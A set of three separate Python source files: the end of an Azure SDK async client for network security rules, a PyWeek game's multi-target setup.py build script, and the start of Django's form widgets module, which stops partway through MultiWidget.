deserialized = self._deserialize('SecurityRule', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('SecurityRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkSecurityGroups/{networkSecurityGroupName}/securityRules/{securityRuleName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
network_security_group_name: str,
security_rule_name: str,
security_rule_parameters: "_models.SecurityRule",
**kwargs: Any
) -> AsyncLROPoller["_models.SecurityRule"]:
"""Creates or updates a security rule in the specified network security group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_security_group_name: The name of the network security group.
:type network_security_group_name: str
:param security_rule_name: The name of the security rule.
:type security_rule_name: str
:param security_rule_parameters: Parameters supplied to the create or update network security
rule operation.
:type security_rule_parameters: ~azure.mgmt.network.v2019_11_01.models.SecurityRule
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either SecurityRule or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2019_11_01.models.SecurityRule]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecurityRule"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
network_security_group_name=network_security_group_name,
security_rule_name=security_rule_name,
security_rule_parameters=security_rule_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('SecurityRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkSecurityGroupName': self._serialize.url("network_security_group_name", network_security_group_name, 'str'),
'securityRuleName': self._serialize.url("security_rule_name", security_rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkSecurityGroups/{networkSecurityGroupName}/securityRules/{securityRuleName}'} # type: ignore
def list(
self,
resource_group_name: str,
network_security_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.SecurityRuleListResult"]:
"""Gets all security rules in a network security group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_security_group_name: The name of the network security group.
:type network_security_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SecurityRuleListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_11_01.models.SecurityRuleListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecurityRuleListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkSecurityGroupName': self._serialize.url("network_security_group_name", network_security_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('SecurityRuleListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkSecurityGroups/{networkSecurityGroupName}/securityRules'} # type: ignore
|
|
import os
# usage: python setup.py command
#
# sdist - build a source dist
# py2exe - build an exe
# py2app - build an app
# cx_freeze - build a linux binary (not implemented)
#
# the goods are placed in the dist dir for you to .zip up or whatever...
APP_NAME = 'zort'
DESCRIPTION = open('README.txt').read()
CHANGES = open('CHANGES.txt').read()
TODO = open('TODO.txt').read()
METADATA = {
'name':APP_NAME,
'version': '0.0.1',
'license': 'BSD License',
'description': 'Zort the Explorer',
'author': 'bitcraft, wkmanire, AlecksG',
'url': 'https://github.com/bitcraft/pyweek19',
'classifiers': [
'Development Status :: 4 - Beta',
'Intended Audience :: End Users/Desktop',
'Intended Audience :: Information Technology',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.5',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.0',
'Programming Language :: Python :: 3.1',
'Programming Language :: Python :: 3.2',
'Topic :: Software Development :: Libraries :: pygame',
'Topic :: Games/Entertainment :: Real Time Strategy',
],
'py2exe.target':'',
#'py2exe.icon':'icon.ico', #64x64
'py2exe.binary':APP_NAME, #leave off the .exe, it will be added
'py2app.target':APP_NAME,
'py2app.icon':'icon.icns', #128x128
#'cx_freeze.cmd':'~/src/cx_Freeze-3.0.3/FreezePython',
'cx_freeze.cmd':'cxfreeze',
'cx_freeze.target':'%s_linux' % APP_NAME,
'cx_freeze.binary':APP_NAME,
}
files_to_remove = ['tk84.dll',
'_ssl.pyd',
'tcl84.dll',
os.path.join('numpy','core', '_dotblas.pyd'),
os.path.join('numpy', 'linalg', 'lapack_lite.pyd'),
]
directories_to_remove = [os.path.join('numpy', 'distutils'),
'distutils',
'tcl',
]
cmdclass = {}
PACKAGEDATA = {
'cmdclass': cmdclass,
'package_dir': {'zort': 'zort',
},
'packages': ['zort',
],
'scripts': ['scripts/zort'],
}
PACKAGEDATA.update(METADATA)
from distutils.core import setup, Extension
try:
import py2exe
except:
pass
import sys
import glob
import os
import shutil
try:
cmd = sys.argv[1]
except IndexError:
print('Usage: setup.py install|py2exe|py2app|cx_freeze')
raise SystemExit
# utility for adding subdirectories
def add_files(dest,generator):
for dirpath, dirnames, filenames in generator:
for name in 'CVS', '.svn':
if name in dirnames:
dirnames.remove(name)
for name in filenames:
if '~' in name: continue
suffix = os.path.splitext(name)[1]
if suffix in ('.pyc', '.pyo'): continue
if name[0] == '.': continue
filename = os.path.join(dirpath, name)
dest.append(filename)
# define what is our data
_DATA_DIR = os.path.join('zort', 'data')
data = []
add_files(data,os.walk(_DATA_DIR))
#data_dirs = [os.path.join(f2.replace(_DATA_DIR, 'data'), '*') for f2 in data]
data_dirs = [os.path.join(f2.replace(_DATA_DIR, 'data')) for f2 in data]
PACKAGEDATA['package_data'] = {'zort': data_dirs}
data.extend(glob.glob('*.txt'))
#data.append('MANIFEST.in')
# define what is our source
src = []
add_files(src,os.walk('zort'))
src.extend(glob.glob('*.py'))
# build the sdist target
if cmd not in "py2exe py2app cx_freeze".split():
f = open("MANIFEST.in","w")
for l in data: f.write("include "+l+"\n")
for l in src: f.write("include "+l+"\n")
f.close()
setup(**PACKAGEDATA)
# build the py2exe target
if cmd in ('py2exe',):
import numpy
dist_dir = os.path.join('dist',METADATA['py2exe.target'])
data_dir = dist_dir
src = 'run_game.py'
dest = METADATA['py2exe.binary']+'.py'
shutil.copy(src,dest)
setup(
options={'py2exe':{
'dist_dir':dist_dir,
'dll_excludes':['_dotblas.pyd','_numpy.pyd', 'numpy.linalg.lapack_lite.pyd', 'numpy.core._dotblas.pyd'] + files_to_remove,
'excludes':['matplotlib', 'tcl', 'OpenGL'],
'ignores':['matplotlib', 'tcl', 'OpenGL'],
'bundle_files':1,
}},
# windows=[{
console=[{
'script':dest,
#'icon_resources':[(1,METADATA['py2exe.icon'])],
}],
)
# build the py2app target
if cmd == 'py2app':
dist_dir = os.path.join('dist',METADATA['py2app.target']+'.app')
data_dir = os.path.join(dist_dir,'Contents','Resources')
from setuptools import setup
src = 'run_game.py'
dest = METADATA['py2app.target']+'.py'
shutil.copy(src,dest)
APP = [dest]
DATA_FILES = []
OPTIONS = {'argv_emulation': True,
#'iconfile':METADATA['py2app.icon']
}
setup(
app=APP,
data_files=DATA_FILES,
options={'py2app': OPTIONS},
setup_requires=['py2app'],
)
# make the cx_freeze target
if cmd == 'cx_freeze':
app_dist_dir = METADATA['cx_freeze.target'] + "_" + METADATA['version']
dist_dir = os.path.join('dist', app_dist_dir)
data_dir = dist_dir
modules_exclude = "tk, tcl"
cmd_args = (METADATA['cx_freeze.cmd'], dist_dir, METADATA['cx_freeze.binary'], modules_exclude)
sys_cmd = '%s --install-dir=%s --target-name=%s --exclude-modules=%s run_game.py' % cmd_args
print(sys_cmd)
os.system(sys_cmd)
import shutil
if os.path.exists(os.path.join(data_dir, "tcl")):
shutil.rmtree( os.path.join(data_dir, "tcl") )
if os.path.exists(os.path.join(data_dir, "tk")):
shutil.rmtree( os.path.join(data_dir, "tk") )
# recursively make a bunch of folders
def make_dirs(dname_):
parts = list(os.path.split(dname_))
dname = None
while len(parts):
if dname == None:
dname = parts.pop(0)
else:
dname = os.path.join(dname,parts.pop(0))
if not os.path.isdir(dname):
os.mkdir(dname)
# copy data into the binaries
if cmd in ('py2exe','cx_freeze','py2app'):
dest = data_dir
for fname in data:
dname = os.path.join(dest,os.path.dirname(fname))
make_dirs(dname)
if not os.path.isdir(fname):
#print (fname,dname)
shutil.copy(fname,dname)
# make a tgz files.
if cmd == 'cx_freeze':
sys_cmd = "cd dist; tar -vczf %s.tgz %s/" % (app_dist_dir,app_dist_dir)
os.system(sys_cmd)
# remove files from the zip.
if 0 and cmd in ('py2exe'):
import shutil
#shutil.rmtree( os.path.join('dist') )
#shutil.rmtree( os.path.join('build') )
os.system("unzip dist/library.zip -d dist\library")
for fn in files_to_remove:
os.remove( os.path.join('dist', 'library', fn) )
for d in directories_to_remove:
if os.path.exists( os.path.join('dist', 'library', d) ):
shutil.rmtree( os.path.join('dist', 'library', d) )
os.remove( os.path.join('dist', 'library.zip') )
os.chdir("dist")
os.chdir("library")
os.system("zip -r -9 ..\library.zip .")
os.chdir("..")
os.chdir("..")
|
|
"""
HTML Widget classes
"""
import copy
import datetime
import warnings
from collections import defaultdict
from itertools import chain
from django.forms.utils import to_current_timezone
from django.templatetags.static import static
from django.utils import datetime_safe, formats
from django.utils.datastructures import OrderedSet
from django.utils.dates import MONTHS
from django.utils.formats import get_format
from django.utils.html import format_html, html_safe
from django.utils.regex_helper import _lazy_re_compile
from django.utils.safestring import mark_safe
from django.utils.topological_sort import (
CyclicDependencyError, stable_topological_sort,
)
from django.utils.translation import gettext_lazy as _
from .renderers import get_default_renderer
__all__ = (
'Media', 'MediaDefiningClass', 'Widget', 'TextInput', 'NumberInput',
'EmailInput', 'URLInput', 'PasswordInput', 'HiddenInput',
'MultipleHiddenInput', 'FileInput', 'ClearableFileInput', 'Textarea',
'DateInput', 'DateTimeInput', 'TimeInput', 'CheckboxInput', 'Select',
'NullBooleanSelect', 'SelectMultiple', 'RadioSelect',
'CheckboxSelectMultiple', 'MultiWidget', 'SplitDateTimeWidget',
'SplitHiddenDateTimeWidget', 'SelectDateWidget',
)
MEDIA_TYPES = ('css', 'js')
class MediaOrderConflictWarning(RuntimeWarning):
pass
@html_safe
class Media:
def __init__(self, media=None, css=None, js=None):
if media is not None:
css = getattr(media, 'css', {})
js = getattr(media, 'js', [])
else:
if css is None:
css = {}
if js is None:
js = []
self._css_lists = [css]
self._js_lists = [js]
def __repr__(self):
return 'Media(css=%r, js=%r)' % (self._css, self._js)
def __str__(self):
return self.render()
@property
def _css(self):
css = defaultdict(list)
for css_list in self._css_lists:
for medium, sublist in css_list.items():
css[medium].append(sublist)
return {medium: self.merge(*lists) for medium, lists in css.items()}
@property
def _js(self):
return self.merge(*self._js_lists)
def render(self):
return mark_safe('\n'.join(chain.from_iterable(getattr(self, 'render_' + name)() for name in MEDIA_TYPES)))
def render_js(self):
return [
format_html(
'<script src="{}"></script>',
self.absolute_path(path)
) for path in self._js
]
def render_css(self):
# To keep rendering order consistent, we can't just iterate over items().
# We need to sort the keys, and iterate over the sorted list.
media = sorted(self._css)
return chain.from_iterable([
format_html(
'<link href="{}" type="text/css" media="{}" rel="stylesheet">',
self.absolute_path(path), medium
) for path in self._css[medium]
] for medium in media)
def absolute_path(self, path):
"""
Given a relative or absolute path to a static asset, return an absolute
path. An absolute path will be returned unchanged while a relative path
will be passed to django.templatetags.static.static().
"""
if path.startswith(('http://', 'https://', '/')):
return path
return static(path)
def __getitem__(self, name):
"""Return a Media object that only contains media of the given type."""
if name in MEDIA_TYPES:
return Media(**{str(name): getattr(self, '_' + name)})
raise KeyError('Unknown media type "%s"' % name)
@staticmethod
def merge(*lists):
"""
Merge lists while trying to keep the relative order of the elements.
Warn if the lists have the same elements in a different relative order.
For static assets it can be important to have them included in the DOM
in a certain order. In JavaScript you may not be able to reference a
global or in CSS you might want to override a style.
"""
dependency_graph = defaultdict(set)
all_items = OrderedSet()
for list_ in filter(None, lists):
head = list_[0]
# The first items depend on nothing but have to be part of the
# dependency graph to be included in the result.
dependency_graph.setdefault(head, set())
for item in list_:
all_items.add(item)
# No self dependencies
if head != item:
dependency_graph[item].add(head)
head = item
try:
return stable_topological_sort(all_items, dependency_graph)
except CyclicDependencyError:
warnings.warn(
'Detected duplicate Media files in an opposite order: {}'.format(
', '.join(repr(list_) for list_ in lists)
), MediaOrderConflictWarning,
)
return list(all_items)
def __add__(self, other):
combined = Media()
combined._css_lists = self._css_lists[:]
combined._js_lists = self._js_lists[:]
for item in other._css_lists:
if item and item not in self._css_lists:
combined._css_lists.append(item)
for item in other._js_lists:
if item and item not in self._js_lists:
combined._js_lists.append(item)
return combined
def media_property(cls):
def _media(self):
# Get the media property of the superclass, if it exists
sup_cls = super(cls, self)
try:
base = sup_cls.media
except AttributeError:
base = Media()
# Get the media definition for this class
definition = getattr(cls, 'Media', None)
if definition:
extend = getattr(definition, 'extend', True)
if extend:
if extend is True:
m = base
else:
m = Media()
for medium in extend:
m = m + base[medium]
return m + Media(definition)
return Media(definition)
return base
return property(_media)
class MediaDefiningClass(type):
"""
Metaclass for classes that can have media definitions.
"""
def __new__(mcs, name, bases, attrs):
new_class = super().__new__(mcs, name, bases, attrs)
if 'media' not in attrs:
new_class.media = media_property(new_class)
return new_class
class Widget(metaclass=MediaDefiningClass):
needs_multipart_form = False # Determines does this widget need multipart form
is_localized = False
is_required = False
supports_microseconds = True
def __init__(self, attrs=None):
self.attrs = {} if attrs is None else attrs.copy()
def __deepcopy__(self, memo):
obj = copy.copy(self)
obj.attrs = self.attrs.copy()
memo[id(self)] = obj
return obj
@property
def is_hidden(self):
return self.input_type == 'hidden' if hasattr(self, 'input_type') else False
def subwidgets(self, name, value, attrs=None):
context = self.get_context(name, value, attrs)
yield context['widget']
def format_value(self, value):
"""
Return a value as it should appear when rendered in a template.
"""
if value == '' or value is None:
return None
if self.is_localized:
return formats.localize_input(value)
return str(value)
def get_context(self, name, value, attrs):
return {
'widget': {
'name': name,
'is_hidden': self.is_hidden,
'required': self.is_required,
'value': self.format_value(value),
'attrs': self.build_attrs(self.attrs, attrs),
'template_name': self.template_name,
},
}
def render(self, name, value, attrs=None, renderer=None):
"""Render the widget as an HTML string."""
context = self.get_context(name, value, attrs)
return self._render(self.template_name, context, renderer)
def _render(self, template_name, context, renderer=None):
if renderer is None:
renderer = get_default_renderer()
return mark_safe(renderer.render(template_name, context))
def build_attrs(self, base_attrs, extra_attrs=None):
"""Build an attribute dictionary."""
return {**base_attrs, **(extra_attrs or {})}
def value_from_datadict(self, data, files, name):
"""
Given a dictionary of data and this widget's name, return the value
of this widget or None if it's not provided.
"""
return data.get(name)
def value_omitted_from_data(self, data, files, name):
return name not in data
def id_for_label(self, id_):
"""
Return the HTML ID attribute of this Widget for use by a <label>,
given the ID of the field. Return None if no ID is available.
This hook is necessary because some widgets have multiple HTML
elements and, thus, multiple IDs. In that case, this method should
return an ID value that corresponds to the first ID in the widget's
tags.
"""
return id_
def use_required_attribute(self, initial):
return not self.is_hidden
class Input(Widget):
"""
Base class for all <input> widgets.
"""
input_type = None # Subclasses must define this.
template_name = 'django/forms/widgets/input.html'
def __init__(self, attrs=None):
if attrs is not None:
attrs = attrs.copy()
self.input_type = attrs.pop('type', self.input_type)
super().__init__(attrs)
def get_context(self, name, value, attrs):
context = super().get_context(name, value, attrs)
context['widget']['type'] = self.input_type
return context
class TextInput(Input):
input_type = 'text'
template_name = 'django/forms/widgets/text.html'
class NumberInput(Input):
input_type = 'number'
template_name = 'django/forms/widgets/number.html'
class EmailInput(Input):
input_type = 'email'
template_name = 'django/forms/widgets/email.html'
class URLInput(Input):
input_type = 'url'
template_name = 'django/forms/widgets/url.html'
class PasswordInput(Input):
input_type = 'password'
template_name = 'django/forms/widgets/password.html'
def __init__(self, attrs=None, render_value=False):
super().__init__(attrs)
self.render_value = render_value
def get_context(self, name, value, attrs):
if not self.render_value:
value = None
return super().get_context(name, value, attrs)
class HiddenInput(Input):
input_type = 'hidden'
template_name = 'django/forms/widgets/hidden.html'
class MultipleHiddenInput(HiddenInput):
"""
Handle <input type="hidden"> for fields that have a list
of values.
"""
template_name = 'django/forms/widgets/multiple_hidden.html'
def get_context(self, name, value, attrs):
context = super().get_context(name, value, attrs)
final_attrs = context['widget']['attrs']
id_ = context['widget']['attrs'].get('id')
subwidgets = []
for index, value_ in enumerate(context['widget']['value']):
widget_attrs = final_attrs.copy()
if id_:
# An ID attribute was given. Add a numeric index as a suffix
# so that the inputs don't all have the same ID attribute.
widget_attrs['id'] = '%s_%s' % (id_, index)
widget = HiddenInput()
widget.is_required = self.is_required
subwidgets.append(widget.get_context(name, value_, widget_attrs)['widget'])
context['widget']['subwidgets'] = subwidgets
return context
def value_from_datadict(self, data, files, name):
try:
getter = data.getlist
except AttributeError:
getter = data.get
return getter(name)
def format_value(self, value):
return [] if value is None else value
class FileInput(Input):
input_type = 'file'
needs_multipart_form = True
template_name = 'django/forms/widgets/file.html'
def format_value(self, value):
"""File input never renders a value."""
return
def value_from_datadict(self, data, files, name):
"File widgets take data from FILES, not POST"
return files.get(name)
def value_omitted_from_data(self, data, files, name):
return name not in files
def use_required_attribute(self, initial):
return super().use_required_attribute(initial) and not initial
FILE_INPUT_CONTRADICTION = object()
class ClearableFileInput(FileInput):
clear_checkbox_label = _('Clear')
initial_text = _('Currently')
input_text = _('Change')
template_name = 'django/forms/widgets/clearable_file_input.html'
def clear_checkbox_name(self, name):
"""
Given the name of the file input, return the name of the clear checkbox
input.
"""
return name + '-clear'
def clear_checkbox_id(self, name):
"""
Given the name of the clear checkbox input, return the HTML id for it.
"""
return name + '_id'
def is_initial(self, value):
"""
Return whether value is considered to be initial value.
"""
return bool(value and getattr(value, 'url', False))
def format_value(self, value):
"""
Return the file object if it has a defined url attribute.
"""
if self.is_initial(value):
return value
def get_context(self, name, value, attrs):
context = super().get_context(name, value, attrs)
checkbox_name = self.clear_checkbox_name(name)
checkbox_id = self.clear_checkbox_id(checkbox_name)
context['widget'].update({
'checkbox_name': checkbox_name,
'checkbox_id': checkbox_id,
'is_initial': self.is_initial(value),
'input_text': self.input_text,
'initial_text': self.initial_text,
'clear_checkbox_label': self.clear_checkbox_label,
})
return context
def value_from_datadict(self, data, files, name):
upload = super().value_from_datadict(data, files, name)
if not self.is_required and CheckboxInput().value_from_datadict(
data, files, self.clear_checkbox_name(name)):
if upload:
# If the user contradicts themselves (uploads a new file AND
# checks the "clear" checkbox), we return a unique marker
# object that FileField will turn into a ValidationError.
return FILE_INPUT_CONTRADICTION
# False signals to clear any existing value, as opposed to just None
return False
return upload
def value_omitted_from_data(self, data, files, name):
return (
super().value_omitted_from_data(data, files, name) and
self.clear_checkbox_name(name) not in data
)
class Textarea(Widget):
template_name = 'django/forms/widgets/textarea.html'
def __init__(self, attrs=None):
# Use slightly better defaults than HTML's 20x2 box
default_attrs = {'cols': '40', 'rows': '10'}
if attrs:
default_attrs.update(attrs)
super().__init__(default_attrs)
class DateTimeBaseInput(TextInput):
format_key = ''
supports_microseconds = False
def __init__(self, attrs=None, format=None):
super().__init__(attrs)
self.format = format or None
def format_value(self, value):
return formats.localize_input(value, self.format or formats.get_format(self.format_key)[0])
class DateInput(DateTimeBaseInput):
format_key = 'DATE_INPUT_FORMATS'
template_name = 'django/forms/widgets/date.html'
class DateTimeInput(DateTimeBaseInput):
format_key = 'DATETIME_INPUT_FORMATS'
template_name = 'django/forms/widgets/datetime.html'
class TimeInput(DateTimeBaseInput):
format_key = 'TIME_INPUT_FORMATS'
template_name = 'django/forms/widgets/time.html'
# Defined at module level so that CheckboxInput is picklable (#17976)
def boolean_check(v):
return not (v is False or v is None or v == '')
class CheckboxInput(Input):
input_type = 'checkbox'
template_name = 'django/forms/widgets/checkbox.html'
def __init__(self, attrs=None, check_test=None):
super().__init__(attrs)
# check_test is a callable that takes a value and returns True
# if the checkbox should be checked for that value.
self.check_test = boolean_check if check_test is None else check_test
def format_value(self, value):
"""Only return the 'value' attribute if value isn't empty."""
if value is True or value is False or value is None or value == '':
return
return str(value)
def get_context(self, name, value, attrs):
if self.check_test(value):
attrs = {**(attrs or {}), 'checked': True}
return super().get_context(name, value, attrs)
def value_from_datadict(self, data, files, name):
if name not in data:
# A missing value means False because HTML form submission does not
# send results for unselected checkboxes.
return False
value = data.get(name)
# Translate true and false strings to boolean values.
values = {'true': True, 'false': False}
if isinstance(value, str):
value = values.get(value.lower(), value)
return bool(value)
def value_omitted_from_data(self, data, files, name):
# HTML checkboxes don't appear in POST data if not checked, so it's
# never known if the value is actually omitted.
return False
class ChoiceWidget(Widget):
allow_multiple_selected = False
input_type = None
template_name = None
option_template_name = None
add_id_index = True
checked_attribute = {'checked': True}
option_inherits_attrs = True
def __init__(self, attrs=None, choices=()):
super().__init__(attrs)
# choices can be any iterable, but we may need to render this widget
# multiple times. Thus, collapse it into a list so it can be consumed
# more than once.
self.choices = list(choices)
def __deepcopy__(self, memo):
obj = copy.copy(self)
obj.attrs = self.attrs.copy()
obj.choices = copy.copy(self.choices)
memo[id(self)] = obj
return obj
def subwidgets(self, name, value, attrs=None):
"""
Yield all "subwidgets" of this widget. Used to enable iterating
options from a BoundField for choice widgets.
"""
value = self.format_value(value)
yield from self.options(name, value, attrs)
def options(self, name, value, attrs=None):
"""Yield a flat list of options for this widgets."""
for group in self.optgroups(name, value, attrs):
yield from group[1]
def optgroups(self, name, value, attrs=None):
"""Return a list of optgroups for this widget."""
groups = []
has_selected = False
for index, (option_value, option_label) in enumerate(self.choices):
if option_value is None:
option_value = ''
subgroup = []
if isinstance(option_label, (list, tuple)):
group_name = option_value
subindex = 0
choices = option_label
else:
group_name = None
subindex = None
choices = [(option_value, option_label)]
groups.append((group_name, subgroup, index))
for subvalue, sublabel in choices:
selected = (
str(subvalue) in value and
(not has_selected or self.allow_multiple_selected)
)
has_selected |= selected
subgroup.append(self.create_option(
name, subvalue, sublabel, selected, index,
subindex=subindex, attrs=attrs,
))
if subindex is not None:
subindex += 1
return groups
def create_option(self, name, value, label, selected, index, subindex=None, attrs=None):
index = str(index) if subindex is None else "%s_%s" % (index, subindex)
if attrs is None:
attrs = {}
option_attrs = self.build_attrs(self.attrs, attrs) if self.option_inherits_attrs else {}
if selected:
option_attrs.update(self.checked_attribute)
if 'id' in option_attrs:
option_attrs['id'] = self.id_for_label(option_attrs['id'], index)
return {
'name': name,
'value': value,
'label': label,
'selected': selected,
'index': index,
'attrs': option_attrs,
'type': self.input_type,
'template_name': self.option_template_name,
'wrap_label': True,
}
def get_context(self, name, value, attrs):
context = super().get_context(name, value, attrs)
context['widget']['optgroups'] = self.optgroups(name, context['widget']['value'], attrs)
return context
def id_for_label(self, id_, index='0'):
"""
Use an incremented id for each option where the main widget
references the zero index.
"""
if id_ and self.add_id_index:
id_ = '%s_%s' % (id_, index)
return id_
def value_from_datadict(self, data, files, name):
getter = data.get
if self.allow_multiple_selected:
try:
getter = data.getlist
except AttributeError:
pass
return getter(name)
def format_value(self, value):
"""Return selected values as a list."""
if value is None and self.allow_multiple_selected:
return []
if not isinstance(value, (tuple, list)):
value = [value]
return [str(v) if v is not None else '' for v in value]
class Select(ChoiceWidget):
input_type = 'select'
template_name = 'django/forms/widgets/select.html'
option_template_name = 'django/forms/widgets/select_option.html'
add_id_index = False
checked_attribute = {'selected': True}
option_inherits_attrs = False
def get_context(self, name, value, attrs):
context = super().get_context(name, value, attrs)
if self.allow_multiple_selected:
context['widget']['attrs']['multiple'] = True
return context
@staticmethod
def _choice_has_empty_value(choice):
"""Return True if the choice's value is empty string or None."""
value, _ = choice
return value is None or value == ''
def use_required_attribute(self, initial):
"""
Don't render 'required' if the first <option> has a value, as that's
invalid HTML.
"""
use_required_attribute = super().use_required_attribute(initial)
# 'required' is always okay for <select multiple>.
if self.allow_multiple_selected:
return use_required_attribute
first_choice = next(iter(self.choices), None)
return use_required_attribute and first_choice is not None and self._choice_has_empty_value(first_choice)
class NullBooleanSelect(Select):
"""
A Select Widget intended to be used with NullBooleanField.
"""
def __init__(self, attrs=None):
choices = (
('unknown', _('Unknown')),
('true', _('Yes')),
('false', _('No')),
)
super().__init__(attrs, choices)
def format_value(self, value):
try:
return {
True: 'true', False: 'false',
'true': 'true', 'false': 'false',
# For backwards compatibility with Django < 2.2.
'2': 'true', '3': 'false',
}[value]
except KeyError:
return 'unknown'
def value_from_datadict(self, data, files, name):
value = data.get(name)
return {
True: True,
'True': True,
'False': False,
False: False,
'true': True,
'false': False,
# For backwards compatibility with Django < 2.2.
'2': True,
'3': False,
}.get(value)
class SelectMultiple(Select):
allow_multiple_selected = True
def value_from_datadict(self, data, files, name):
try:
getter = data.getlist
except AttributeError:
getter = data.get
return getter(name)
def value_omitted_from_data(self, data, files, name):
# An unselected <select multiple> doesn't appear in POST data, so it's
# never known if the value is actually omitted.
return False
class RadioSelect(ChoiceWidget):
input_type = 'radio'
template_name = 'django/forms/widgets/radio.html'
option_template_name = 'django/forms/widgets/radio_option.html'
class CheckboxSelectMultiple(ChoiceWidget):
allow_multiple_selected = True
input_type = 'checkbox'
template_name = 'django/forms/widgets/checkbox_select.html'
option_template_name = 'django/forms/widgets/checkbox_option.html'
def use_required_attribute(self, initial):
# Don't use the 'required' attribute because browser validation would
# require all checkboxes to be checked instead of at least one.
return False
def value_omitted_from_data(self, data, files, name):
# HTML checkboxes don't appear in POST data if not checked, so it's
# never known if the value is actually omitted.
return False
def id_for_label(self, id_, index=None):
"""
Don't include for="field_0" in <label> because clicking such a label
would toggle the first checkbox.
"""
if index is None:
return ''
return super().id_for_label(id_, index)
class MultiWidget(Widget):
"""
A widget that is composed of multiple widgets.
In addition to the values added by Widget.get_context(), this widget
adds a list of subwidgets to the context as widget['subwidgets'].
These can be looped over and rendered like normal widgets.
You'll probably want to use this class with MultiValueField.
"""
template_name = 'django/forms/widgets/multiwidget.html'
def __init__(self, widgets, attrs=None):
if isinstance(widgets, dict):
self.widgets_names = [
('_%s' % name) if name else '' for name in widgets
]
widgets = widgets.values()
else:
self.widgets_names = ['_%s' % i for i in range(len(widgets))]
self.widgets = [w() if isinstance(w, type) else w for w in widgets]
super().__init__(attrs)
@property
def is_hidden(self):
return all(w.is_hidden for w in self.widgets)
def get_context(self, name, value, attrs):
context = super().get_context(name, value, attrs)
if self.is_localized:
for widget in self.widgets:
widget.is_localized = self.is_localized
# value is a list of values, each corresponding to a widget
# in self.widgets.
if not isinstance(value, list):
value = self.decompress(value)
final_attrs = context['widget']['attrs']
input_type = final_attrs.pop('type', None)
id_ = final_attrs.get('id')
subwidgets = []
for i, (widget_name, widget) in enumerate(zip(self.widgets_names, self.widgets)):
if input_type is not None:
widget.input_type = input_type
widget_name = name + widget_name
try:
widget_value = value[i]
except IndexError:
widget_value = None
if id_:
widget_attrs = final_attrs.copy()
widget_attrs['id'] = '%s_%s' % (id_, i)
else:
widget_attrs = final_attrs
